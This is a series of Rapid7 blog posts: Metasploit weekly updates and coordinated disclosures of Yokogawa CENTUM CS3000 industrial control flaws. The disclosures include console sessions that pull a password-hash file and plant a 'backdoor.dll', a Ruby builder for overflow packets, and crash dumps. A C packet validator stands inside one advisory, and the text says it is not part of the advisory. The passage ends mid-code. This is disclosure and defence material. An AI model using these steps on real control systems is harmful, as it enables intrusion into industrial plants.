Rapid7 Blog

Zero-day  

Weekly Metasploit Wrapup: SMB File Shares


Sharing is Caring

One of the nits we've all had to pick with Metasploit is that when you have a module that involves getting a client to connect to an evil SMB server to fetch a file, the strategy usually used involved generating the file with a module, then serving that up on your own Samba or Windows share. This worked, of course, but what a hassle. Who wants to run two things? Nobody!

Well, those days are now behind us, thanks largely to the Herculean efforts of Metasploit community contributor Matthew "0x41414141" Hall. This last week, we landed #3074, one of the longest running pull requests we've had. SMB itself is pretty complicated, as anyone who's worked with this protocol can attest, so it's no wonder this took a year or so of gnashing and hacking. Coding up an SMB file server in Metasploit-flavored Ruby was a huge feat, and I'm super happy that Matthew stuck with it. He worked with the Metasploit open source community (especially Juan there at the end), and hauled this thing over the finish line, all the while with an amazingly positive attitude.

So, now that we have the mixin, I'm sure there are a bunch of modules that could use a retrofit to use it. If you're looking for some way to contribute to the Framework, that'd be a fine place to start.

New Modules

Since the last blog post, we've added two new exploits to the Metasploit Framework. The first is a Flash exploit from Juan Vazquez, who's taken on Flash reversing and exploitation as a personal mission in the light of the run of recent Flash 0-days. Since these bugs first became public when they were discovered as part of active attacks, it's important to test to ensure that your end-user constituency has a reasonable update schedule.

The other involves the sinister-sounding Nvidia Mental Ray Satellite Service. Turns out, this is not an orbital mind control platform, but rendering software used by tons of movie studios. So, more ground-based mind control, I guess. The Metasploit module was implemented by Ben "Meatballs" Campbell, based on the research by Luigi Auriemma and Donato Ferrante. Incidentally, it uses 0x41414141's SMB file server mixin, so it's got that going for it now, which is nice. Granted, this sort of rendering software suite isn't likely to come up in your average engagement, but if you're in the business of running this kind of gear, you'll probably want to double-check your network separation -- while it was disclosed a little while back, there's no indication from the vendor that there's been a patch. But really, how often do movie studios get compromised, anyway? Probably no big deal, right?

Exploit modules

Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free by juan vazquez, Unknown, and hdarwin exploits CVE-2015-0311
Nvidia Mental Ray Satellite Service Arbitrary DLL Injection by Ben Campbell, Donato Ferrante, and Luigi Auriemma

You should also check out what's included in this week's packaged release by reading Thao's most excellent release notes.

R7-2014-10 Disclosure: Yokogawa CENTUM CS3000 BKBCopyD.exe File System Access


This blog post represents the final disclosure of the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) in their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly.

Let's start with a quote from the Yokogawa description of their own product in order to introduce it:

"Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The "BKBCopyD.exe" service, started when running the "FCS / Test Function", listens by default on TCP/20111. There is a lack of authentication which makes it possible to abuse several operations provided by the service in order to:

Leak the CENTUM project database location.
Read arbitrary files.
Write arbitrary files.

Reading and writing to the file system will happen with the privileges of the CENTUM user.

Disclosure Timeline

Date            Description
March, 2014     Client-attorney relationship established between Cipherlaw Group and Rapid7
April 14, 2014  Vulnerability details disclosed to attorney
May 1, 2014     Details offered to vendor
June 25, 2014   Details disclosed to CERTs
Aug 9, 2014     Details, Metasploit module published as PR 3637

Technical Analysis

The "BKBCopyD.exe" service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below:

PMODE: this command allows getting the value of environment variables. It includes the MR_DBPATH variable with the project path in the file system or on a network resource.

RETR: this command allows reading arbitrary files from the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.

STOR: this command allows storing arbitrary files in the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.

Exploitation

A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where it is possible to leak the database location and to retrieve and store arbitrary files.

Retrieving the database location with PMODE:

    msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client
    msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63
    RHOST => 172.17.1.63
    msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE
    action => PMODE
    msf auxiliary(yokogawa_bkbcopyd_client) > run
    [*] 172.17.1.63: 20111 - Sending PMODE packet...
    [+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful

Retrieving the project password database (Password.odc) with RETR:

    msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR
    action => RETR
    msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
    RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
    msf auxiliary(yokogawa_bkbcopyd_client) > run
    [*] 172.17.1.63: 20111 - Sending RETR packet...
    [*] Server started.
    [*] 172.17.1.63 - Getting data...
    [+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._687005.bin saved!
    [*] 172.17.1.63 - Getting data...
    [*] Server stopped.
    [*] Auxiliary module execution completed
    msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._687005.bin
    [*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._687005.bin

    #YDCS_PASSWORD
    PROJECT: MYPJT
    OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083
    ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083
    ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083
    PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083
    TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083
    #!2712db741f4af7718f74fd179deacbe3

Placing remote files with STOR:

    msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR
    action => STOR
    msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll
    LPATH => /tmp/backdoor.dll
    msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
    RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
    msf auxiliary(yokogawa_bkbcopyd_client) > run
    [*] 172.17.1.63: 20111 - Sending STOR packet...
    [*] Server started.
    [*] 172.17.1.63 - Sending data...
    [*] Server stopped.
    [*] Auxiliary module execution completed
    msf auxiliary(yokogawa_bkbcopyd_client) >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Weekly Metasploit Update: More Meterpreters!


Meterpreter for All The Platforms

This week is pretty exciting for us, since it's not every day we give out commit rights to the Rapid7 Metasploit repo. I'm very happy to report that Tim Wright has agreed to step up and help out with moving Meterpreter research and development forward, focusing mainly on the Java and Android implementations.

Many Metasploit users are familiar with Meterpreter for Windows, since it's the default payload for Microsoft systems and effectively the reference implementation. In fact, Metasploit contributor OJ Reeves will be talking about Meterpreter internals on Friday at AusCERT2014, so if you're in the area or otherwise attending, you should certainly check it out.

That said, many people also don't know that Meterpreter is more than just a rootkit / backdoor / persistence agent for Windows. It's a whole protocol and system for interacting with compromised machines, and has always been intended to be cross-platform. Today, we have versions written in POSIX, PHP, Python, and Java/Android. It's that last one that's been getting a lot of attention lately, primarily by community contributors mihi, Anwar, and of course the aforementioned Tim.

There are tons and tons of cool new features and boring old bugfixes just waiting to be committed in the many Meterpreters (Meterpreti?), so if you have ideas, or better, a willingness to run through test cases and documentation, or best, code to contribute to make those features a reality, I strongly urge you to get in touch with OJ, Tim, or really anyone from Rapid7, all of whom tend to hang out on the #metasploit channel on Freenode IRC.

New Modules

We have two new exploits this week: yet another Flash reverse engineered from yet another 0day found circulating in the wild, and another Yokogawa CS3000 module. Both are thanks to Juan Vazquez.

Exploit modules

Adobe Flash Player Shader Buffer Overflow by juan vazquez and Unknown exploits CVE-2014-0515
Yokogawa CS3000 BKESimmgr.exe Buffer Overflow by juan vazquez and Redsadic exploits CVE-2014-0782

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

IE 0-day, we got you covered


News broke this weekend of yet another IE 0-day under ("limited, targeted") exploitation in the wild. Microsoft responded with an advisory, but no patches yet. Given that the risk from the known exploit is mitigated by the usual defence in depth tactics, I would not expect Microsoft to release an out of band patch, though a "fix it" type hotfix would be in keeping with Microsoft's recent tactics.

The known exploit for this issue relies on Adobe Flash being present and enabled. Disabling or removing Flash will block the known exploit, but does not address the root cause issue in Internet Explorer.

To assess your exposure to this threat:

Nexpose users can view affected systems in their environment from existing scan data using Dynamic Asset Groups.
ControlsInsight users can examine which systems in their environment have the correct mitigations in place (including Flash disablement).
Both products report Windows XP as an "Obsolete Version" (which is an automatic PCI failure).

This 0-day is the first of what will inevitably be many issues to affect Windows XP in the post-XP era. Users still on XP have no choice but to upgrade in order to receive protection. Of course, for Microsoft, Windows XP is already all but forgotten, in that, since it is no longer supported, it is not listed in the vulnerable systems. In a totally unscientific survey, looking at traffic to Rapid7.com, approximately 1% of our total web visitors identify as running Windows XP, but approximately 15% are running some version of IE. We don't check for mitigations in place unless you ask us to. Overall, this issue isn't all that different from any number of IE 0-days, we usually get three or four every year, except that it's the first in the post-XP world. All the more reason for users to move to modern, supported operating systems where advanced mitigation techniques are available.

R7-2013-19 Disclosure: Yokogawa CENTUM CS 3000 Vulnerabilities


On Saturday, March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. Today, as promised, we're publishing details for three of the vulnerabilities found in the product. For all of you who weren't able to attend RootedCON, we're just going to quote the Yokogawa description of their own product in order to introduce it:

"Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerabilities Summary

This report includes details for three vulnerabilities found in different services used by the Yokogawa CENTUM CS3000 product in order to provide all its functionality. The vulnerabilities have been found in version R3.08.50:

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow: The "BKCLogSvr.exe" service, started automatically with the system, listens by default on UDP/52302. By sending a special sequence of packets to UDP/52302 it's possible to trigger a heap based buffer overflow, after a use of uninitialized data, which allows a DoS of "BKCLogSvr.exe" and, in the last instance, could allow execution of arbitrary code with SYSTEM privileges.

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow: The "BKHOdeq.exe" service, started when running the "FCS / Test Function", listens by default on TCP/20109 and TCP/20171. By sending a specially crafted packet to the port TCP/20171 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow: The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality.
The "BKBCopyD.exe" service, started when running the "FCS / Test Function", listens by default on TCP/20111. By sending a specially crafted packet to the port TCP/20111 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

Disclosure Timeline

Date          Description
Dec 27, 2013  Initial disclosure to the vendor, Yokogawa
Jan 13, 2014  Disclosure to CERT/CC
Jan 14, 2014  CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014  CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities. ICS-CERT tracking #: ICS-VU-205881. JPCERT tracking #: JVNVU#98181377, JPECERT#98191377
Mar 07, 2014  Yokogawa advisory published (PDF).
Mar 10, 2014  Metasploit modules published in Pull Request #3081

Technical Analysis

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

The BKCLogSvr service listens on UDP/52302, where it expects packets carrying logs of no more than 1024 bytes, as can be seen in the next assembly from libbkclogsvr.dll (IDA notation):

    .text:61DC1283 push eax ; fromlen
    .text:61DC1284 mov eax, s
    .text:61DC1289 push ecx ; from
    .text:61DC128A push 0 ; flags
    .text:61DC128C lea edx, [esp+42Ch+buf]
    .text:61DC1290 push 400h ; len - packets including logs of 1024 bytes at most
    .text:61DC1295 push edx ; buf
    .text:61DC1296 push eax ; s
    .text:61DC1297 mov [esp+438h+fromlen], 10h
    .text:61DC129F call recvfrom

Here is a log packet sample:

    "\x96\x00\x00\x00\x00\x00\x00\x00\x48\x41\x53\x00\x00\x00\x00\x00" #........ HIS.....
    "\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x4f\x47\x00\x00\x00\x00\x00" #........ LOG.....
    "\x32\x30\x31\x33\x2f\x31\x31\x2f\x30\x39\x20\x31\x39\x3a\x32\x31" #2013/11/ 09 19:21
    "\x3a\x34\x32\x20\x2b\x30\x31\x3a\x30\x30\x2c\x45\x56\x45\x4e\x54" #:42 +01: 00,EVENT
    "\x2c\x30\x78\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x3c\x42\x4f\x53" #,0x00000 000,<BOS
    "\x53\x56\x43\x3e\x20\x2c\x43\x3a\x5c\x43\x53\x33\x30\x30\x30\x5c" #SVC> ,C: \CS3000\
    "\x50\x52\x4f\x47\x52\x41\x4d\x5c\x42\x4b\x48\x42\x6f\x73\x53\x76" #PROGRAM\ BKHBosSv
    "\x63\x2e\x65\x78\x65\x3a\x42\x6f\x73\x53\x76\x63\x4d\x61\x69\x6e" #c.exe:Bo sSvcMain
    "\x3a\x32\x36\x32\x33\x2c\x22\x73\x74\x61\x74\x75\x73\x20\x3a\x20" #:2623,"s tatus :
    "\x42\x4f\x4f\x54\x22\x22"                                         #BOOT".

The meaning of the several fields, according to our understanding, is:

    Offset  Field
    0x0     Size
    0x4     Unknown
    0x8     Source
    0x18    Level
    0x20    Message

The heap overflow occurs while handling the creation of the path where the log will be stored. The memory allocation happens in sub_61DC15A0 (IDA notation), and it's a buffer of size 0x1b8:

    .text:61DC16A7 push 1B8h ; Size
    .text:61DC16AC call ds:malloc ; malloc memory: 0x1b8

When sending two consecutive packets with a long Level field, coalescing both Level and Message fields, an overflow happens after the allocation, in a strcpy style copy, resulting in the next crash:

    0:005> g
    (c24.a6c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\CS3000\LIBRARY\libbkclogsvr.dll -
    eax=00000344 ebx=01846e48 ecx=000000ae edx=01846f9c esi=023af7a8 edi=01847000
    eip=61dc1709 esp=023af708 ebp=0183de48 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
    libbkclogsvr!BKCLogSvrLibResume+0x549:
    61dc1709 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    0:004> db esi
    023af7a8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af7b8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af7c8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af7d8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af7e8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af7f8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af808  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    023af818  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    0:004> db edi
    01847000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    0:004> db edi - 10
    01846ff0  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    01847000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    01847060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    0:004> !heap -p -a edi
        address 01847000 found in
        _DPH_HEAP_ROOT @ 17d1000
        in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                     17d19a4:          1846e48              1b8 -          1846000             2000
        7c918f01 ntdll!RtlAllocateHeap+0x00000e64
        77c2c3c9 msvcrt!_heap_alloc+0x000000e0
        77c2c3e7 msvcrt!_nh_malloc+0x00000013
        77c2c42e msvcrt!malloc+0x00000027
        61dc16b2 libbkclogsvr!BKCLogSvrLibResume+0x000004f2

At the moment of the overflow, the source of the data points to controlled data from the malformed Level/Message field. But in order to trigger the overflow, two consecutive packets are needed. The explanation is on the stack, and in how the function doesn't take care of correctly initializing its local variables:

    .text:61DC16E3 lea edi, [esp+450h+var_440] ; origin for the copy comes from here, uninitialized stack is the root cause of the overflow being exploitable.
    .text:61DC16E7 xor eax, eax
    .text:61DC16E9 lea edx, [ebx+12Ch]
    .text:61DC16EF repne scasb
    .text:61DC16F1 not ecx
    .text:61DC16F3 sub edi, ecx
    .text:61DC16F5 push 104h
    .text:61DC16FA mov eax, ecx
    .text:61DC16FC mov esi, edi
    .text:61DC16FE shr ecx, 2
    .text:61DC1701 mov edi, edx
    .text:61DC1703 lea edx, [ebx+154h]
    .text:61DC1709 rep movsd ; overflow happens here

The origin for the copy is a local variable, stored on the stack, which has not been initialized previously. So if malicious data can be stored on the stack, the overflow happens. It's possible to put malicious data on the stack by sending consecutive malicious packets. As already explained, in order to exploit the dangerous strcpy, controlled data needs to be stored on the stack beforehand in order to abuse the uninitialized local variables.
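As an added defensive check, not part of the advisory or of the Metasploit module, the following C validator parses a BKCLogSvr datagram with the field offsets from the table above and rejects the malformed shape the analysis describes: a Level field with no terminator inside its 8 bytes, so that Level and Message coalesce. Assumptions: field widths are inferred from consecutive offsets (Source 16 bytes, Level 8 bytes), and the Size field is expected to equal the datagram length, as it does in the sample packet; both sample builders construct test input and are not captured traffic.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* BKCLogSvr log packet layout, from the advisory's Offset/Field table.
 * Field widths are inferred from consecutive offsets (assumption). */
#define LOG_OFF_SIZE    0x00  /* 4-byte little-endian packet size */
#define LOG_OFF_UNKNOWN 0x04
#define LOG_OFF_SOURCE  0x08  /* 16 bytes, NUL padded */
#define LOG_OFF_LEVEL   0x18  /* 8 bytes, NUL padded ("LOG" in the sample) */
#define LOG_OFF_MESSAGE 0x20  /* free text to the end of the datagram */
#define LOG_MAX_PACKET  1024  /* recvfrom() is called with len = 400h */

enum log_verdict {
    LOG_OK = 0,
    LOG_ERR_SHORT,         /* datagram shorter than the fixed header */
    LOG_ERR_SIZE_FIELD,    /* Size field > 1024 or not equal to the datagram length */
    LOG_ERR_SOURCE_UNTERM, /* Source has no NUL within its 16 bytes */
    LOG_ERR_LEVEL_UNTERM   /* Level has no NUL within its 8 bytes: Level/Message coalesced */
};

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void write_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Check one datagram before it is handed to the log writer. */
enum log_verdict check_log_packet(const uint8_t *pkt, size_t len) {
    if (len < LOG_OFF_MESSAGE)
        return LOG_ERR_SHORT;
    uint32_t size = read_le32(pkt + LOG_OFF_SIZE);
    if (size > LOG_MAX_PACKET || size != len)
        return LOG_ERR_SIZE_FIELD;
    /* every fixed-width string field must terminate inside its own slot */
    if (memchr(pkt + LOG_OFF_SOURCE, 0, LOG_OFF_LEVEL - LOG_OFF_SOURCE) == NULL)
        return LOG_ERR_SOURCE_UNTERM;
    if (memchr(pkt + LOG_OFF_LEVEL, 0, LOG_OFF_MESSAGE - LOG_OFF_LEVEL) == NULL)
        return LOG_ERR_LEVEL_UNTERM;
    return LOG_OK;
}

/* Constructed sample: the well-formed shape of the advisory's packet
 * (Source "HAS", Level "LOG", a shortened EVENT message). Returns its length. */
size_t sample_benign(uint8_t *out, size_t cap) {
    const char *msg = "2013/11/09 19:21:42 +01:00,EVENT,0x00000000,<BOSSVC> ,status : BOOT";
    size_t len = LOG_OFF_MESSAGE + strlen(msg);
    if (cap < len) return 0;
    memset(out, 0, len);
    write_le32(out + LOG_OFF_SIZE, (uint32_t)len);
    memcpy(out + LOG_OFF_SOURCE, "HAS", 3);
    memcpy(out + LOG_OFF_LEVEL, "LOG", 3);
    memcpy(out + LOG_OFF_MESSAGE, msg, strlen(msg));
    return len;
}

/* Constructed sample: the malformed shape from the analysis, a 1024-byte
 * datagram whose Level field has no terminator and runs into Message. */
size_t sample_coalesced(uint8_t *out, size_t cap) {
    if (cap < LOG_MAX_PACKET) return 0;
    memset(out, 'B', LOG_MAX_PACKET);
    write_le32(out + LOG_OFF_SIZE, LOG_MAX_PACKET);
    memset(out + LOG_OFF_SOURCE, 0, LOG_OFF_LEVEL - LOG_OFF_SOURCE);
    memcpy(out + LOG_OFF_SOURCE, "SOURCE", 6);
    return LOG_MAX_PACKET;
}

int main(void) {
    uint8_t buf[LOG_MAX_PACKET];
    size_t n = sample_benign(buf, sizeof buf);
    printf("benign packet (%zu bytes): verdict %d\n", n, check_log_packet(buf, n));
    n = sample_coalesced(buf, sizeof buf);
    printf("coalesced packet (%zu bytes): verdict %d\n", n, check_log_packet(buf, n));
    return 0;
}
```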
In order to accomplish it, two consecutive, malformed packets can be sent to the server:

    test = [1024].pack("V")             # packet length
    test << "AAAA"                      # Unknown
    test << "SOURCE\x00\x00"            # Source
    test << "\x00" * 8                  # Padding
    test << "B" * (1024 - test.length)  # Level & Message coalesced

When the first packet is processed by the vulnerable function, this is the stack (origin for the dangerous copy):

    0:005> g
    Breakpoint 0 hit
    eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=005c41c0
    eip=61dc16e3 esp=00a9f70c ebp=00000000 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
    libbkclogsvr!BKCLogSvrLibResume+0x523:
    61dc16e3 8d7c2410        lea     edi,[esp+10h]
    0:004> t
    eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=00a9f71c
    eip=61dc16e7 esp=00a9f70c ebp=00000000 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
    libbkclogsvr!BKCLogSvrLibResume+0x527:
    61dc16e7 33c0            xor     eax,eax
    0:004> db edi
    00a9f71c  53 4f 55 52 43 45 42 42-42 42 42 42 42 42 00 00  SOURCEBBBBBBBB..
    00a9f72c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    00a9f73c  00 04 00 00 41 41 41 41-53 4f 55 52 43 45 00 00  ....AAAASOURCE..
    00a9f74c  00 00 00 00 00 00 00 00-42 42 42 42 42 42 42 42  ........BBBBBBBB
    00a9f75c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    00a9f76c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    00a9f77c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
    00a9f78c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

Later, while processing this first packet, the stack is filled with the packet contents. It occurs when flushing the contents of the log:

    .text:61DC1572 call ebx ; fflush ; Here is where the stack is filled with controlled data
    .text:61DC1572 ;
    .text:61DC1572 ; ChildEBP RetAddr  Args to Child
    .text:61DC1572 ; 00a9fab8 77c3035a 00000003 005c4298 000003e0 msvcrt!_write_lk+0xd6
    .text:61DC1572 ; 00a9faf4 77c3edb2 00000003 005c4298 000003e0 msvcrt!_write+0x57
    .text:61DC1572 ; 00a9fb14 77c3edf3 77c5fce0 00000000 00a9fb58 msvcrt!_flush+0x35
    .text:61DC1572 ; 00a9fb24 77c3ef26 77c5fce0 77c40ed3 7c802530 msvcrt!_fflush_lk+0xf
    .text:61DC1572 ; 00a9fb58 61dc1574 77c5fce0 00a9fb84 77c5fce0 msvcrt!fflush+0x30
    .text:61DC1572 ; WARNING: Stack unwind information not available. Following frames may be wrong.
    .text:61DC1572 ; 00a9fb60 00a9fb84 77c5fce0 0089fc60 005c3eb8 libbkclogsvr!BKCLogSvrLibResume+0x3b4

When the second packet is processed by the vulnerable function, this is the stack (origin for the dangerous copy):

    0:005> g
    Breakpoint 0 hit
    eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=005c53f8
    eip=61dc16e3 esp=00a9f70c ebp=005c4008 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
    libbkclogsvr!BKCLogSvrLibResume+0x523:
    61dc16e3 8d7c2410        lea     edi,[esp+10h]
    0:004> t
    eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=00a9f71c
    eip=61dc16e7 esp=00a9f70c ebp=005c4008 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
    libbkclogsvr!BKCLogSvrLibResume+0x527:
    61dc16e7 33c0            xor     eax,eax
    0:004> db edi
    00a9f71c  53 4f 55 52 43 45 42 42-42 42 42 42 42 42 42 42  SOURCEBBBBBBBBBB
    00a9f72c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f73c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f74c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f75c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f76c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f77c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    00a9f78c  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
    0:004> g
    (430.f50): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\CS3000\LIBRARY\LibBKCCommon.dll -
    eax=00000000 ebx=00000104 ecx=ffffffff edx=00a9f3ec esi=00a9fa60 edi=42424242
    eip=61e51708 esp=00a9f3d8 ebp=005c5248 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
    LibBKCCommon!BKCGetLogDir+0x78:
    61e51708 f2ae            repne scas byte ptr es:[edi]

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

The vulnerability exists in the function "sub_41EB60" (IDA notation), which makes an insecure memory copy while reading lines from user controlled input:

    int __cdecl vulnerable_sub_41EB60(int a1, int a2)
    {
      int v2; // eax@1
      char v3; // cl@1
      int result; // eax@3
      int i; // edx@5

      v2 = a2;
      v3 = *(_BYTE *)a2;
      if ( *(_BYTE *)a2 != ':' || *(_BYTE *)(a2 + 1) != ':' )
      {
        for ( i = 0; v3 != '\n'; ++v2 ) // Dangerous loop, copying data to a stack buffer, until an end of line is found
        {
          if ( v3 == '\r' )
            break;
          *(_BYTE *)(i + a1) = v3; // Byte copy to the stack, without taking the destination size into account.
          v3 = *(_BYTE *)(v2 + 1);
          ++i;
